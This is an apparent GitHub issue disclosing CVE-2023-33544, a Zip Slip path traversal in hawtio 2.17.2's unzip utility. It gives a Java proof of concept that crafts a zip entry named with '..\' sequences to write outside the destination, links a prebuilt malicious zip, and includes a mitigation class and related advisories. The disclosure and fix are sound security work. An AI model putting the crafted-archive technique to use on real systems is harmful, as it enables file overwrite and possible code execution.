CVE-2023-33544: Path Traversal when unzip zip file · Issue #2832 · hawtio/hawtio

hawtio 2.17.2 is vulnerable to Path Traversal. It is possible to input malicious zip files, which can result in the high-risk files after decompression being stored in any location, even leading to file overwrite.


Description

In the method "unzip" (line 111) of the file Zips.java,

```java
public static void unzip(InputStream in, File toDir) throws IOException {
```

it is possible to input malicious zip files, which can result in the high-risk files after decompression being stored in any location, even leading to file overwrite and other situations.

Proof of Concept

I use a Maven project and import the utility in pom.xml:

```xml
<dependency>
    <groupId>io.hawt</groupId>
    <artifactId>hawtio-util</artifactId>
    <version>2.17.2</version>
</dependency>
```

Use the following zip() method to create a zip file from a txt file; the name of the compressed file will be renamed to "..\..\a\b\c\poc.txt". (You should create this path first.)
Then call the Zips.unzip() method, originally intended to unzip the file to "D:\project\TestProject\ICFuzzTest\testData\unzip", but it will eventually be extracted to another directory: "D:\project\TestProject\ICFuzzTest\a\b\c\poc.txt".
This may cause the original file to be overwritten by a high-risk file.

```java
import io.hawt.util.Zips;

import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.util.zip.ZipEntry;
import java.util.zip.ZipOutputStream;

/**
 * Hawtio has an unzip method which may have a path traversal problem.
 */
public class HawtioUnzip {

    // https://github.com/hawtio/hawtio/blob/268bca24c61c88c76ea661533514082954e38ed5/hawtio-util/src/main/java/io/hawt/util/Zips.java#L111
    public static void main(String[] args) throws IOException {
        zip(); // create a poc

        String zipFile = "D:\\project\\TestProject\\ICFuzzTest\\testData\\unzip\\poc.zip";
        String destination = "D:\\project\\TestProject\\ICFuzzTest\\testData\\unzip";
        InputStream in = new FileInputStream(zipFile);
        Zips.unzip(in, new File(destination));
        in.close();
    }

    // create a poc
    public static void zip() {
        ZipOutputStream zos = null;
        try {
            zos = new ZipOutputStream(new FileOutputStream(
                    "D:\\project\\TestProject\\ICFuzzTest\\testData\\unzip\\poc.zip"));
            String srcFile = "..\\..\\a\\b\\c\\poc.txt";  // the entry name stored in the zip
            String destFile = "D:\\project\\TestProject\\ICFuzzTest\\testData\\unzip\\poc.txt";
            zos.putNextEntry(new ZipEntry(srcFile));
            FileInputStream in = new FileInputStream(destFile);
            int len;
            byte[] buf = new byte[1024];
            while ((len = in.read(buf)) != -1) {
                zos.write(buf, 0, len);
            }
            zos.closeEntry();
            in.close();
        } catch (Exception e) {
            throw new RuntimeException("zip error from ZipUtils", e);
        } finally {
            if (zos != null) {
                try {
                    zos.close();
                } catch (IOException e) {
                    e.printStackTrace();
                }
            }
        }
    }
}
```

The following is the constructed zip file:

https://github.com/Zlase0820/VulnData/blob/main/src.main/data/poc.zip

Suggestion

I think we can add a simple verification check on the path to avoid this issue. We can refer to other verification methods for unzip under Apache, such as:

https://github.com/apache/druid/blob/master/processing/src/main/java/org/apache/druid/utils/CompressionUtils.java#L242

It had the same error, and it was fixed in CVE-2023-27603.
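The check the suggestion refers to is the standard Zip Slip mitigation: canonicalise the destination directory once, resolve every entry name against it, normalise the result, and refuse the entry if it no longer lies under the destination. The class below is an added example written for this page, not hawtio's own `Zips` code nor the Druid method linked above; the class name `SafeUnzip` and the helper `resolveSafely` are assumptions. Its `main` builds a constructed in-memory zip carrying the same kind of entry name as the report (`..\..\a\b\c\poc.txt`) and shows the entry being rejected before anything is written.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.zip.ZipEntry;
import java.util.zip.ZipInputStream;
import java.util.zip.ZipOutputStream;

public class SafeUnzip {

    /**
     * Extracts a zip stream into toDir, refusing any entry whose resolved
     * path would land outside toDir (Zip Slip / path traversal).
     */
    public static void unzip(InputStream in, File toDir) throws IOException {
        // Canonicalise the destination once; every entry is checked against it.
        Path root = toDir.toPath().toAbsolutePath().normalize();
        Files.createDirectories(root);
        try (ZipInputStream zis = new ZipInputStream(in)) {
            ZipEntry entry;
            while ((entry = zis.getNextEntry()) != null) {
                // The check runs before any byte of this entry touches disk.
                Path target = resolveSafely(root, entry.getName());
                if (entry.isDirectory()) {
                    Files.createDirectories(target);
                } else {
                    Files.createDirectories(target.getParent());
                    try (OutputStream out = Files.newOutputStream(target)) {
                        byte[] buf = new byte[8192];
                        int len;
                        while ((len = zis.read(buf)) != -1) {
                            out.write(buf, 0, len);
                        }
                    }
                }
                zis.closeEntry();
            }
        }
    }

    /**
     * Returns root/entryName if, after normalisation, it still lies under root;
     * throws otherwise. Backslashes are treated as separators so that entries
     * written on Windows are judged the same way as "../" entries. Absolute
     * entry names are rejected too, because Path.resolve() would discard root.
     * Path.startsWith() compares whole path components, so "/out2/x" is not
     * mistaken for being under "/out".
     */
    static Path resolveSafely(Path root, String entryName) throws IOException {
        String unixName = entryName.replace('\\', '/');
        Path target = root.resolve(unixName).normalize();
        if (!target.startsWith(root)) {
            throw new IOException("zip entry escapes target directory: " + entryName);
        }
        return target;
    }

    // Demonstration on a constructed in-memory zip (not the reporter's poc.zip).
    public static void main(String[] args) throws IOException {
        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        try (ZipOutputStream zos = new ZipOutputStream(bytes)) {
            zos.putNextEntry(new ZipEntry("..\\..\\a\\b\\c\\poc.txt"));
            zos.write("constructed sample content".getBytes(StandardCharsets.UTF_8));
            zos.closeEntry();
        }
        File dest = Files.createTempDirectory("unzip-demo").toFile();
        try {
            unzip(new ByteArrayInputStream(bytes.toByteArray()), dest);
            System.out.println("extracted into " + dest);
        } catch (IOException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Two details matter in practice: the comparison is done on normalised `Path` objects rather than on strings, and the entry name is validated before the file is opened, so a rejected entry leaves no partial file behind. A string `startsWith` check on un-normalised names would accept `..\` sequences on Windows and sibling-directory prefixes on any platform.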

Related news

GHSA-pj5j-w7mw-w797 / CVE-2023-27603: Apache Linkis Zip Slip issue

In Apache Linkis <=1.3.1, because the Manager module engineConn material upload does not check the zip path, there is a Zip Slip issue, which can lead to a potential RCE vulnerability. We recommend users upgrade Linkis to version 1.3.2.

GHSA-p223-c4w6-q454: hawtio vulnerable to Path Traversal

hawtio 2.17.2 is vulnerable to Path Traversal. It is possible to input malicious zip files, which can result in the high-risk files after decompression being stored in any location, even leading to file overwrite.
